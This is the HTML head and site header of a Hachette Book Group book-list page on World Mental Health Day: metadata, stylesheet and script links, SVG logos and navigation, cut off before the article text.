<!DOCTYPE html>
<html lang="en-US">
	<head>
		<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="google-site-verification" content="85wAGAWAuJVKY63Av9XQL_d8G9S3oJQ9FIKRL_p_NnA" />
<meta name="msvalidate.01" content="0051B8D8511A2B9F4DE35FC989DC79B8" />
<meta name="p:domain_verify" content="d17b1f4fbc23ea8e105438f14592909f"/>
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>8 Books for World Mental Health Day | Hachette Book Group</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//static.srcspot.com' />
<link rel='dns-prefetch' href='//launcher.zo.la' />
<link rel='dns-prefetch' href='//platform.twitter.com' />
<link rel='dns-prefetch' href='//unpkg.com' />
<link rel='dns-prefetch' href='//cdnjs.cloudflare.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Feed" href="https://www.hachettebookgroup.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Hachette Book Group &raquo; Comments Feed" href="https://www.hachettebookgroup.com/comments/feed/" />
<meta name='description' content='Books for all ages to help approach a vital part of our health.' /><!-- WP SEO -->
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.hachettebookgroup.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.2"}};
/*! This file is auto-generated */
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='https://www.hachettebookgroup.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.2' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://www.hachettebookgroup.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://www.hachettebookgroup.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.0.2' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<style id='hachette-plugin-campaign-view-variables-inline-css' type='text/css'>
	.campaign-view {
		--campaign-view-font-family: 'Source Sans Pro', helvetica, sans-serif, sans-serif;
		--campaign-view-primary-color: inherit;
		--campaign-view-secondary-color: inherit;
	}
</style>
<link rel='stylesheet' id='hachette-site-css-css'  href='https://www.hachettebookgroup.com/wp-content/themes/hachette/static/css/hachette-site.min.css?ver=56abd56c9fcae44ccf28' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-all-domains-css-css'  href='https://www.hachettebookgroup.com/wp-content/themes/hachette-book-group/client/build/css/lens-hbg-all-domains.css?ver=94083c39b99d9c48b82e' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-google-fonts-source-sans-css'  href='https://fonts.googleapis.com/css?family=Source+Sans+Pro%3A400%2C600%2C700&#038;ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='hbg-leaflet-css-css'  href='https://unpkg.com/leaflet@1.7.1/dist/leaflet.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://www.hachettebookgroup.com/wp-content/mu-plugins/jetpack-11.3/css/jetpack.css?ver=11.3.2' type='text/css' media='all' />
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://cdnjs.cloudflare.com/ajax/libs/Swiper/8.2.4/swiper-bundle.min.js?ver=8.2.4' id='hbg-swiper-js-js'></script>
<script type='text/javascript' src='https://static.srcspot.com/libs/brunhilde.js?ver=0.1.0' id='mimecast-script-js'></script>
<script type='text/javascript' src='https://launcher.zo.la/assets/zbwidget-launcher-0.1.0.js?ver=0.1.0' id='zola-widget-launcher-js'></script>
<script type='text/javascript' src='https://unpkg.com/leaflet@1.7.1/dist/leaflet.js?ver=1.0' id='hachette-leaflet-js-js'></script>
<link rel="https://api.w.org/" href="https://www.hachettebookgroup.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.hachettebookgroup.com/wp-json/wp/v2/posts/1269467" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.hachettebookgroup.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.hachettebookgroup.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 6.0.2" />
<link rel="canonical" href="https://www.hachettebookgroup.com/book-list/8-books-for-world-mental-health-day/" />
<link rel='shortlink' href='https://www.hachettebookgroup.com/?p=1269467' />
<link rel="alternate" type="application/json+oembed" href="https://www.hachettebookgroup.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hachettebookgroup.com%2Fbook-list%2F8-books-for-world-mental-health-day%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.hachettebookgroup.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.hachettebookgroup.com%2Fbook-list%2F8-books-for-world-mental-health-day%2F&#038;format=xml" />
<style>img#wpstats{display:none}</style>
				<script>
				window.dataLayer = window.dataLayer || [];
				window.dataLayer.push(
					{"imprint":"hachette","genre":"","genreSecondary":"","genreTertiary":"","format":""}				);
			</script>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="8 Books for World Mental Health Day" />
<meta property="og:url" content="https://www.hachettebookgroup.com/book-list/8-books-for-world-mental-health-day/" />
<meta property="og:description" content="&nbsp; World Mental Health Day is marked every year on October 10th to raise awareness about mental health around the world and to mobilize efforts to support those experiencing mental health issue…" />
<meta property="article:published_time" content="2022-10-05T14:40:19+00:00" />
<meta property="article:modified_time" content="2022-10-05T14:40:51+00:00" />
<meta property="og:site_name" content="Hachette Book Group" />
<meta property="og:image" content="https://www.hachettebookgroup.com/wp-content/uploads/2022/10/3.png?fit=1024%2C512" />
<meta property="og:image:width" content="1024" />
<meta property="og:image:height" content="512" />
<meta property="og:image:alt" content="" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:text:title" content="8 Books for World Mental Health Day" />
<meta name="twitter:image" content="https://www.hachettebookgroup.com/wp-content/uploads/2022/10/3.png?fit=1024%2C512&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />

<!-- End Jetpack Open Graph Tags -->
<link rel="icon" href="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://www.hachettebookgroup.com/wp-content/uploads/2017/09/cropped-hachette-logo1.png?fit=270%2C270" />
		<style type="text/css" id="wp-custom-css">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</style>
			</head>
	<body class="post-template-default single single-post postid-1269467 single-format-standard">
				<div id="page" class="site single-post page">
			
<header id="site-header" class="site-header hbg-domain">
	<a href="#content" class="skiplink">Skip to Main Content</a>
	
<div class="site-header__top site-header__default" data-toggle-element="site-header__search">
	<div class="site-header__mobile-menu-toggle">
		<button class="site-header__hamburger toggleable" data-toggle-target="site-header__mobile-menu" data-toggle-block="site-header__mobile-menu">&#9776;</button>
	</div>

	<h2 class="site-header__branding">
					<div class="site-header__desktop-logo">
				<a href="https://www.hachettebookgroup.com/">
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 286.14 75.3" role="img" aria-labelledby="title-hachette-logo-ini-4219687440  desc-hachette-logo-ini-342531034">
	<title id="title-hachette-logo-ini-4219687440">Hachette Logo Large</title>
	<desc id="desc-hachette-logo-ini-342531034">Light blue Hachette logo with icon and text</desc>
	<style>.hbg-1{fill:#3c97ba}</style>
	<polygon role="presentation" class="hbg-1" points="59.72 75.02 59.72 15.3 36.93 15.3 36.93 19.62 55.4 19.62 55.4 70.69 41.26 70.69 41.26 52.23 18.46 52.23 18.46 56.55 36.93 56.55 36.93 75.02 59.72 75.02"/>
	<polygon role="presentation" class="hbg-1" points="22.79 33.76 41.26 33.76 41.26 38.09 18.47 38.09 18.47 19.62 4.33 19.62 4.33 70.69 22.79 70.69 22.79 75.02 0 75.02 0 15.29 22.79 15.29 22.79 33.76"/>
	<path role="presentation" class="hbg-1" d="M80.79,74.83c-1.14,0-2.28,0-3.42,0-.54,0-.73-.18-.73-.73q0-7.62,0-15.24c0-.53.2-.68.7-.68,2.13,0,4.26,0,6.39,0A4.28,4.28,0,0,1,88,63.66a3.5,3.5,0,0,1-1.44,2.18c-.44.32-.51.53,0,.85,1.81,1.14,2.09,3,1.59,5.07a4.07,4.07,0,0,1-4,3c-1.14,0-2.28,0-3.42,0ZM79.06,70c0,.64,0,1.29,0,1.93s.2.8.72.8c1.28,0,2.58,0,3.85-.08A2.45,2.45,0,0,0,86,70.15a2.42,2.42,0,0,0-2.18-2.64,30.93,30.93,0,0,0-4.21-.11c-.19,0-.51.38-.53.62A18.89,18.89,0,0,0,79.06,70Zm2.63-9.68c-.64,0-1.29,0-1.93,0s-.71.18-.7.7q0,1.78,0,3.57c0,.57.28.74.77.74,1,0,2,0,3,0A4.78,4.78,0,0,0,84.32,65a2.37,2.37,0,0,0,1.39-2.75,2.33,2.33,0,0,0-2.23-1.93C82.88,60.33,82.29,60.34,81.69,60.34Z"/>
	<path role="presentation" class="hbg-1" d="M171.55,74.81c-.94,0-1.73,0-2.5,0-.2,0-.44-.3-.55-.52-1-1.89-1.92-3.79-2.84-5.71a1.14,1.14,0,0,0-1.25-.79,10.38,10.38,0,0,1-1.63,0c-.61,0-.84.18-.82.81,0,1.81,0,3.62,0,5.43,0,.61-.19.85-.81.83-1.93,0-1.6.17-1.61-1.55,0-4.71,0-9.42,0-14.13,0-1,0-1,1-1,1.88,0,3.77,0,5.65,0a4.57,4.57,0,0,1,4.91,4.27A4.42,4.42,0,0,1,168.73,67c-1,.48-1,.49-.46,1.46ZM161.95,63c0,.69,0,1.39,0,2.08,0,.45.2.66.61.65,1.36,0,2.73,0,4.07-.12a2.59,2.59,0,0,0,2.12-2.8,2.62,2.62,0,0,0-2.48-2.49c-1.24,0-2.47,0-3.71,0-.44,0-.63.16-.62.61C162,61.64,161.95,62.33,161.95,63Z"/>
	<path role="presentation" class="hbg-1" d="M135.8,74.8c-.94,0-1.74,0-2.54,0-.19,0-.41-.33-.54-.55-1.31-2.27-2.61-4.56-3.9-6.84-.46-.81-.59-.83-1.19-.1a1.2,1.2,0,0,1-.14.17,6.47,6.47,0,0,0-2.17,6.17c.13,1.19,0,1.21-1.21,1.2-.17,0-.35,0-.52,0-.47,0-.66-.19-.66-.67q0-7.66,0-15.33c0-.43.15-.64.6-.64,2.21,0,1.78-.19,1.8,1.66s0,3.72,0,5.58v1a5.36,5.36,0,0,0,.74-.59q2.89-3.54,5.75-7.1a1.32,1.32,0,0,1,1.19-.59c.66,0,1.33,0,2.17,0-.38.48-.65.84-.93,1.19-1.28,1.55-2.55,3.1-3.85,4.63a1,1,0,0,0-.12,1.37c1.69,2.8,3.32,5.63,5,8.45C135.43,74.11,135.57,74.39,135.8,74.8Z"/>
	<path role="presentation" class="hbg-1" d="M155.47,63a17.1,17.1,0,0,1-2,0c-.21,0-.44-.37-.54-.62a3.57,3.57,0,0,0-5.43-1.61,3.08,3.08,0,0,0-1.4,2.43,53.36,53.36,0,0,0,0,6.6,3.23,3.23,0,0,0,3.54,3.09,3.5,3.5,0,0,0,3.52-3.42c.05-1.83.09-1.53-1.46-1.55-.47,0-.94,0-1.41,0s-.73-.2-.7-.71a2.41,2.41,0,0,1,0-.74c.09-.22.34-.51.52-.52,1.64,0,3.27,0,4.91,0,.17,0,.49.24.49.37,0,1.68.25,3.39-.37,5a5.33,5.33,0,0,1-4.28,3.5,6,6,0,0,1-6.24-2.2,5,5,0,0,1-1-3c-.05-2,0-3.92,0-5.88A5.54,5.54,0,0,1,149.23,58a5.76,5.76,0,0,1,6.16,4.4A4.79,4.79,0,0,1,155.47,63Z"/>
	<path role="presentation" class="hbg-1" d="M174.34,66.49a29,29,0,0,1,.35-4.21,6,6,0,0,1,11.42,0,12,12,0,0,1,.24,2.73c0,1.76-.06,3.52-.15,5.27-.11,2.1-1.94,4-4.37,4.56-2.74.66-5.75-.58-6.77-3a13.59,13.59,0,0,1-.63-3.47,14.43,14.43,0,0,1,0-1.86Zm2.43,0c.07,1.17.07,2.34.22,3.49a3.34,3.34,0,0,0,3.4,2.93,3.43,3.43,0,0,0,3.43-3.08,27.88,27.88,0,0,0,0-6.73,3.46,3.46,0,0,0-3.34-3A3.42,3.42,0,0,0,177,63C176.85,64.13,176.84,65.32,176.77,66.5Z"/>
	<path role="presentation" class="hbg-1" d="M118.85,66.55c0,1.21.06,2.43,0,3.64a5.4,5.4,0,0,1-4.42,4.68,6,6,0,0,1-6.31-2.33,5.45,5.45,0,0,1-.84-2.18,28.23,28.23,0,0,1,0-7.62,5.92,5.92,0,0,1,11.72,1.14c0,.89,0,1.79,0,2.68Zm-9.48-.05c.07,1,.13,2,.2,3a3.47,3.47,0,0,0,6.93,0c.13-2,.08-4.06,0-6.08A3.4,3.4,0,0,0,113,60.11a3.34,3.34,0,0,0-3.45,3.05C109.46,64.27,109.44,65.38,109.37,66.5Z"/>
	<path role="presentation" class="hbg-1" d="M103.59,66.51a32.21,32.21,0,0,1,0,3.64,5.34,5.34,0,0,1-4.41,4.7A5.94,5.94,0,0,1,92.48,72a5.08,5.08,0,0,1-.6-2.11c-.05-2.35,0-4.7.05-7.05C92,60.33,94.57,58,97.68,58a5.65,5.65,0,0,1,6,5.82c0,.89,0,1.78,0,2.68Zm-2.23,0c-.05-1-.11-2-.15-3a3.49,3.49,0,0,0-3.46-3.39,3.43,3.43,0,0,0-3.48,3.28c-.07,2.08-.11,4.16,0,6.23a3.3,3.3,0,0,0,3.43,3.31,3.43,3.43,0,0,0,3.48-3.12C101.27,68.71,101.3,67.62,101.36,66.5Z"/>
	<path role="presentation" class="hbg-1" d="M192.47,64.26c0,1.73,0,3.47,0,5.2a3.55,3.55,0,0,0,6.81,1.33,7.29,7.29,0,0,0,.39-2.4c0-3.1,0-6.2,0-9.29,0-.71.21-1,.93-.92,1.58.06,1.39-.15,1.4,1.4,0,3.22,0,6.44,0,9.66a5.35,5.35,0,0,1-3.56,5.31c-2.72,1-6.29.37-7.7-2.59a7.6,7.6,0,0,1-.65-3c-.08-3.32,0-6.64,0-10,0-.61.19-.84.81-.82,1.9.06,1.6-.25,1.62,1.61C192.48,61.29,192.47,62.78,192.47,64.26Z"/>
	<path role="presentation" class="hbg-1" d="M206.38,66.45c0-2.48,0-5,0-7.44,0-.6.16-.84.79-.82,2,0,4.07,0,6.1,0a4.74,4.74,0,0,1,4.46,3.43c.6,2.38-.12,4.66-2,5.72a8.6,8.6,0,0,1-3,.83,23.35,23.35,0,0,1-3,0c-.9,0-1,.09-1,1,0,1.61,0,3.22,0,4.84,0,.57-.17.79-.76.79-1.88,0-1.54.09-1.56-1.54C206.37,71,206.38,68.74,206.38,66.45Zm2.32-3.28c0,.72,0,1.44,0,2.15,0,.43.15.75.62.75,1.38,0,2.77,0,4.14-.14a2.69,2.69,0,0,0,2.1-2.92,2.74,2.74,0,0,0-2.51-2.66c-1.21,0-2.43,0-3.64,0-.57,0-.74.25-.72.77C208.71,61.79,208.7,62.48,208.7,63.18Z"/>
	<path role="presentation" class="hbg-1" d="M97.72,47.56v-20c0-5.92-3.09-9-8.33-9s-8.5,3.23-8.5,9v20h-4.2V.28h4.2V18.84a11.8,11.8,0,0,1,9.25-4.09c7.35,0,11.79,4.69,11.79,12V47.56h-4.2"/>
	<path role="presentation" class="hbg-1" d="M128.46,25.88c0-4.9-2.43-7.46-8.63-7.46-4.32,0-6.52,1.06-8.48,3.86l-2.94-2.62c2.83-3.77,6.2-4.9,11.48-4.9,8.63,0,12.77,3.82,12.77,10.75V47.55h-4.17V44.4c-2.66,2.66-5.13,3.55-9.57,3.55-4.59,0-7.27-.85-9.33-3a9.48,9.48,0,0,1-2.4-6.5c0-5.81,4.12-9.37,11.26-9.37h5.78v3.31H119c-5.14,0-7.65,2.09-7.65,6s2.43,5.86,7.84,5.86c2.84,0,5.42-.25,7.56-2.33,1.15-1.09,1.71-3,1.71-5.84V25.88"/><path class="hbg-1" d="M153.22,48c-8.43,0-14.3-5.86-14.3-16.61s5.87-16.59,14.3-16.59c4.45,0,7.3,1.18,10.68,4.86L161,22.32c-2.58-2.88-4.59-3.84-7.8-3.84a9.33,9.33,0,0,0-8,3.94c-1.56,2.21-2.15,4.7-2.15,8.92s.58,6.73,2.15,8.94a9.33,9.33,0,0,0,8,3.95c3.21,0,5.22-1,7.8-3.84l2.88,2.69c-3.39,3.69-6.24,4.88-10.68,4.88"/>
	<path role="presentation" class="hbg-1" d="M188.77,47.56v-20c0-5.92-3.09-9-8.33-9s-8.5,3.23-8.5,9v20h-4.2V.28h4.2V18.84a11.79,11.79,0,0,1,9.25-4.09c7.35,0,11.79,4.69,11.79,12V47.56h-4.21"/>
	<path role="presentation" class="hbg-1" d="M207.24,29.12v3.31h17.92V30.5c0-9.71-4.94-15.75-13.17-15.75s-13.17,6.16-13.17,16.59c0,11.2,5.25,16.61,14,16.61,5.45,0,8.51-1.69,11.81-5l-3-2.49c-2.64,2.64-4.89,3.75-8.67,3.75-5.15,0-8.25-2.64-9.44-7.4a21.35,21.35,0,0,1-.56-5.49c0-3.77.16-5.71,1.1-7.84a8.67,8.67,0,0,1,15.8,0A13.66,13.66,0,0,1,221,29.12H207.24"/>
	<path role="presentation" class="hbg-1" d="M239.33,47.56c-5.35,0-8.07-3.76-8.07-8.61V18.46H227V15.29h4.25V5.07h4.21V15.29h6.09v3.16h-6.09V38.91c0,3.11,1.45,5,4.62,5h2.21v3.67h-3"/>
	<path role="presentation" class="hbg-1" d="M255.9,47.56c-5.35,0-8.07-3.76-8.07-8.61V18.46h-4.25V15.29h4.25V5.07H252V15.29h6.09v3.16H252V38.91c0,3.11,1.44,5,4.62,5h2.2v3.67h-3"/>
	<path role="presentation" class="hbg-1" d="M268.22,29.12v3.31h17.92V30.5c0-9.71-4.94-15.75-13.17-15.75S259.8,20.91,259.8,31.34c0,11.2,5.25,16.61,14,16.61,5.46,0,8.51-1.69,11.81-5l-3-2.49c-2.64,2.64-4.88,3.75-8.67,3.75-5.15,0-8.25-2.64-9.44-7.4a21.33,21.33,0,0,1-.56-5.49c0-3.77.16-5.71,1.1-7.84a8.67,8.67,0,0,1,15.8,0A13.77,13.77,0,0,1,282,29.12H268.22">
				</a>
			</div>
			<div class="site-header__mobile-logo">
				<a href="https://www.hachettebookgroup.com/">
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-1563720942  desc-hachette-logo-4143937577">
	<title id="title-hachette-logo-1563720942">Hachette Logo</title>
	<desc id="desc-hachette-logo-4143937577">Hachette Logo</desc>
	<polygon role="presentation" class="logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
	<polygon role="presentation" class="logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
				</a>
			</div>
			</h2>

	<ul class="site-header__social">
		<li class="site-header__social-header">
			<a href="https://www.hachettebookgroup.com/newsletters/">Newsletter</a>
		</li>	
		<li class="site-header__social-list-item">
			<a href="/preferences" aria-label="Preferences"><div class="header-button">
<svg xmlns="http://www.w3.org/2000/svg" style="width: 100%; height: 100%;" viewBox="0 0 512 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M495.9 166.6C499.2 175.2 496.4 184.9 489.6 191.2L446.3 230.6C447.4 238.9 448 247.4 448 256C448 264.6 447.4 273.1 446.3 281.4L489.6 320.8C496.4 327.1 499.2 336.8 495.9 345.4C491.5 357.3 486.2 368.8 480.2 379.7L475.5 387.8C468.9 398.8 461.5 409.2 453.4 419.1C447.4 426.2 437.7 428.7 428.9 425.9L373.2 408.1C359.8 418.4 344.1 427 329.2 433.6L316.7 490.7C314.7 499.7 307.7 506.1 298.5 508.5C284.7 510.8 270.5 512 255.1 512C241.5 512 227.3 510.8 213.5 508.5C204.3 506.1 197.3 499.7 195.3 490.7L182.8 433.6C167 427 152.2 418.4 138.8 408.1L83.14 425.9C74.3 428.7 64.55 426.2 58.63 419.1C50.52 409.2 43.12 398.8 36.52 387.8L31.84 379.7C25.77 368.8 20.49 357.3 16.06 345.4C12.82 336.8 15.55 327.1 22.41 320.8L65.67 281.4C64.57 273.1 64 264.6 64 256C64 247.4 64.57 238.9 65.67 230.6L22.41 191.2C15.55 184.9 12.82 175.3 16.06 166.6C20.49 154.7 25.78 143.2 31.84 132.3L36.51 124.2C43.12 113.2 50.52 102.8 58.63 92.95C64.55 85.8 74.3 83.32 83.14 86.14L138.8 103.9C152.2 93.56 167 84.96 182.8 78.43L195.3 21.33C197.3 12.25 204.3 5.04 213.5 3.51C227.3 1.201 241.5 0 256 0C270.5 0 284.7 1.201 298.5 3.51C307.7 5.04 314.7 12.25 316.7 21.33L329.2 78.43C344.1 84.96 359.8 93.56 373.2 103.9L428.9 86.14C437.7 83.32 447.4 85.8 453.4 92.95C461.5 102.8 468.9 113.2 475.5 124.2L480.2 132.3C486.2 143.2 491.5 154.7 495.9 166.6V166.6zM256 336C300.2 336 336 300.2 336 255.1C336 211.8 300.2 175.1 256 175.1C211.8 175.1 176 211.8 176 255.1C176 300.2 211.8 336 256 336z"/></svg>
</div></a>
		</li>
					<li>
				<a href="#" aria-label="Shopping Cart" class="full-cart" data-drawer-trigger aria-controls="flyout-cart" aria-expanded="false">
					<div class="zola-preorder-cart">
						<div>
							<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 55.74 52.64"><defs></defs><title>shopping-cart</title><g id="shopping-cart"><path class="cls-1" d="M17.23,42.28a5.27,5.27,0,1,0,0,10.53,5.27,5.27,0,1,0,0-10.53ZM.51.17V5.43H6.09l10,20-3.9,6.31a8.91,8.91,0,0,0-.56,2.64,5.44,5.44,0,0,0,5.57,5.26H50.68V34.39H18.35a.59.59,0,0,1-.56-.53V33.6l2.51-4.48H40.92a5.13,5.13,0,0,0,4.74-2.63l10-17.11a1.41,1.41,0,0,0,.56-1.32,2.56,2.56,0,0,0-2.79-2.63H12.22L9.71.17ZM45.1,42.28a5.27,5.27,0,1,0,5.58,5.27A5.44,5.44,0,0,0,45.1,42.28Z" transform="translate(-0.51 -0.17)"/></g></svg>
						</div>
						<span aria-label="Shopping Cart Quantity" id="cart-quantity" class="badge d-none">0</span>
					</div>
				</a>
			</li>
			</ul>
	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.hachettebookgroup.com/">
		<label class="site-search__label" for="search-form-633d99a95b007">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input add-autocomplete" type="search" id="search-form-633d99a95b007" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-1226520760  desc-search-icon-145086385">
	<title id="title-search-icon-1226520760">Search</title>
	<desc id="desc-search-icon-145086385">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-hachette-primary-menu-container"><nav class="site-header__nav"><ul id="menu-hachette-primary-menu" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genres/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Genres">Genres</a><span id="expand-site-header__sub-menu-1186042641" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1186042641" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1186042641" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2623892471  desc-arrow-2684322778">
	<title id="titlet-arrow-2623892471">Arrow Icon</title>
	<desc id="desc-arrow-2684322778">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1186042641" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1186042641"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/childrens-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Children&#039;s Books">Children&#039;s Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/cooking/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Cooking">Cooking</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/fiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Fiction">Fiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/mind-body-spirit/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mind, Body, Spirit">Mind, Body, Spirit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/mystery-thriller/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mystery &amp; Thriller">Mystery &amp; Thriller</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/nonfiction/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Nonfiction">Nonfiction</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Romance">Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/genre-category/sci-fi-fantasy/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sci-Fi &amp; 